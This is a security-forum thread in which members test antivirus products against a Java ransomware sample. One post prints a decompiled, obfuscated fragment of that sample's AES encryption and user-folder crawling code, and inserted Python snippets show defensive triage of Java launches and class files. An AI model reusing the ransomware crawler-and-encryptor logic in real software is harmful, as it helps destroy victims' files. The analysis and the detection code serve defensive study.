Q&A Is F-Secure sleeping again?

Status
Not open for further replies.

McMcbrad

Level 23
Oct 16, 2020
1,252
@marcopaone @McMcbrad Thank you both for testing Defender(y)
The ransomware protection of AVG/Avast prevented the encryption of documents/pictures, could Controlled Folder Access of Defender do the same?
It was on and protecting all folders that go there by default:
[screenshot: 1607283235679.png]
 

McMcbrad

Level 23
Oct 16, 2020
1,252
There is something which I highlighted in my Avast review, somewhere as a comment.

Many AVs don't see a Java app as a separate program: they see the javaw.exe process, which is whitelisted, and allow it to do whatever. This is why Java ransomware (as well as all Java malware) is not to be underestimated.
Avast/AVG see *.jar files as individual programs and block them from encrypting/decrypting, accessing browser passwords and sensitive files, as well as accessing the webcam.
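The whitelisting gap described here (the AV judges javaw.exe, not the JAR it runs) is something process telemetry can compensate for. The following is an added example, not code from the thread or from Avast/AVG: it reads a few constructed Sysmon-style process-creation records and attributes each java/javaw launch to the JAR on its command line, flagging JARs run from user-writable locations. The field names, sample paths and path heuristics are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample records, loosely modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Java\jre1.8.0_271\bin\javaw.exe",
     "CommandLine": r'"C:\Program Files\Java\jre1.8.0_271\bin\javaw.exe" -jar "C:\Users\alice\Downloads\invoice.jar"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files\Java\jre1.8.0_271\bin\java.exe",
     "CommandLine": r"java -cp C:\tools\app.jar com.example.Main",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

JAVA_LAUNCHERS = {"java.exe", "javaw.exe"}
# Assumed locations where a dropped .jar typically lands; the JVM binary itself is not judged.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")


def jar_from_command_line(cmd):
    """Return the JAR a Java launcher was told to run (-jar or -cp/-classpath), or None."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]
    for flag in ("-jar", "-cp", "-classpath"):
        for i, tok in enumerate(tokens[:-1]):
            if tok.lower() == flag:
                return tokens[i + 1]
    return None


def triage(event):
    """Attribute a process-creation record to the program that actually runs.

    For java/javaw the program is the JAR on the command line, not the launcher,
    which is the distinction the thread says most AV whitelisting misses.
    """
    launcher = PureWindowsPath(event["Image"]).name.lower() in JAVA_LAUNCHERS
    if not launcher:
        return {"launcher": False, "jar": None, "suspicious": False}
    jar = jar_from_command_line(event["CommandLine"])
    suspicious = jar is not None and any(m in jar.lower() for m in USER_WRITABLE)
    return {"launcher": True, "jar": jar, "suspicious": suspicious}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(PureWindowsPath(ev["Image"]).name, "->", triage(ev))
```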
 

McMcbrad

Level 23
Oct 16, 2020
1,252
By request:
McAfee LiveSafe 16.0 R29 (latest) + Shadow Defender Latest + Windows 10 20H2 (latest)
[screenshot: 1607283997544.png]


Static Scan detects nothing:
[screenshot: 1607284071814.png]


Upon execution, the outcome is the same as with Windows Defender:
File on desktop dropped and auto-opened
[screenshot: 1607284109025.png]


I kissed my screenshots of conversations with hackers via RATs goodbye:
[screenshot: 1607284208510.png]
 

MacDefender

Level 14
Verified
Oct 13, 2019
639
If this is bypassing CFA it must be using some sort of special technique to encrypt. CFA is very protective and doesn’t have much of a whitelist, it also causes a lot of false positives.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
 

McMcbrad

Level 23
Oct 16, 2020
1,252
Nothing too unusual.
Encryption algorithm:
// [obf_method], [obf_strings1] and [obf_strings2] stand in for identifiers that are
// obfuscated whitespace-only names in the decompiled output (mis-encoded on the page)
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
encryptAes encryptAes2;
encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open.[obf_method]((Object)[obf_strings1][1], (int)-970469275));
encryptAes2.encrypter = Cipher.getInstance(Main$Open.[obf_method]((Object)[obf_strings1][2], (int)-704451753));
encryptAes2.keyGenerator.init(128);
encryptAes2.key = encryptAes2.keyGenerator.generateKey();
File crawler and main algorithm:
import java.util.HashMap;
encryptAes encryptAes2 = new encryptAes(); // <---- instantiates the class with the code above
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.[obf_method]((Object)[obf_strings2][0], (int)-601438172)) + Main$Open.[obf_method]((Object)[obf_strings2][1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.[obf_method]((Object)[obf_strings2][2], (int)1693082425)) + Main$Open.[obf_method]((Object)[obf_strings2][3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.[obf_method]((Object)[obf_strings2][4], (int)-557160074)) + Main$Open.[obf_method]((Object)[obf_strings2][5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.[obf_method]((Object)[obf_strings2][6], (int)-504606357)) + Main$Open.[obf_method]((Object)[obf_strings2][7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.[obf_method]((Object)[obf_strings2][8], (int)713534176)) + Main$Open.[obf_method]((Object)[obf_strings2][9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open.[obf_method]((Object)[obf_strings2][10], (int)1242977540)) + Main$Open.[obf_method]((Object)[obf_strings2][11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
These are built-in Java 6 libraries and not even loaded from GitHub.
 
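Because the decompiled sample reaches only JDK classes (KeyGenerator, Cipher, Files.walkFileTree, SimpleFileVisitor) and downloads nothing, what a static scan can still see is the constant pool of each .class inside the jar. The following is an added example, not the thread's or any vendor's code: it parses a class file's constant pool and flags the combination of file-tree walking with symmetric-cipher setup. The minimal class file it checks is constructed inline; the indicator lists are assumptions.

```python
import struct

# Byte sizes of constant-pool entries other than Utf8, by tag (JVMS section 4.4).
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
            15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

# Assumed groups of JDK names whose co-occurrence mirrors the decompiled sample.
INDICATORS = {
    "walk": ("java/nio/file/Files", "walkFileTree", "java/nio/file/SimpleFileVisitor"),
    "crypto": ("javax/crypto/KeyGenerator", "javax/crypto/Cipher"),
}


def constant_pool_strings(data):
    """Walk a class file's constant pool and return every CONSTANT_Utf8 entry."""
    magic, _minor, _major, count = struct.unpack(">IHHH", data[:10])
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    off, idx, out = 10, 1, []
    while idx < count:
        tag = data[off]
        off += 1
        if tag == 1:  # CONSTANT_Utf8: u2 length followed by modified UTF-8 bytes
            (length,) = struct.unpack(">H", data[off:off + 2])
            out.append(data[off + 2:off + 2 + length].decode("utf-8", "replace"))
            off += 2 + length
        else:
            off += CP_SIZES[tag]
        idx += 2 if tag in (5, 6) else 1  # long and double occupy two pool slots
    return out


def triage_class(data):
    """Report which indicator groups a class references and whether both are present."""
    strings = set(constant_pool_strings(data))
    hits = {group: [n for n in names if n in strings] for group, names in INDICATORS.items()}
    hits["flag"] = bool(hits["walk"]) and bool(hits["crypto"])
    return hits


def build_sample_class(utf8_entries):
    """Construct a minimal (constant pool only) class file for offline testing."""
    pool = b"".join(struct.pack(">BH", 1, len(s)) + s.encode() for s in utf8_entries)
    # major version 50 = Java 6, matching the thread's note about Java 6 libraries
    return struct.pack(">IHHH", 0xCAFEBABE, 0, 50, len(utf8_entries) + 1) + pool


# Constructed sample: the names a class like the decompiled encryptAes would reference.
SAMPLE_CLASS = build_sample_class(["java/nio/file/Files", "walkFileTree",
                                   "javax/crypto/KeyGenerator", "javax/crypto/Cipher",
                                   "getInstance", "generateKey"])
```

Only direct references show up this way; a sample that reaches the same classes through reflection leaves different strings in the pool, so treat a hit as triage input, not a verdict.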

KonradPL

Level 4
May 1, 2018
169
What about eset? Maybe Eset can do better?
 

McMcbrad

Level 23
Oct 16, 2020
1,252
In the newspapers they say that in 2021 there will be a new wave: Ransomware 2.0
So be careful and stay protected!
They say things like this every year... in the newspapers every year will be the coldest in 30 years, threats will evade all AVs, and more...
It won't take long before vendors perfect the detection of the new ransomware as well :D
How many new threat types have come up in the last few years, and they are all well handled.
 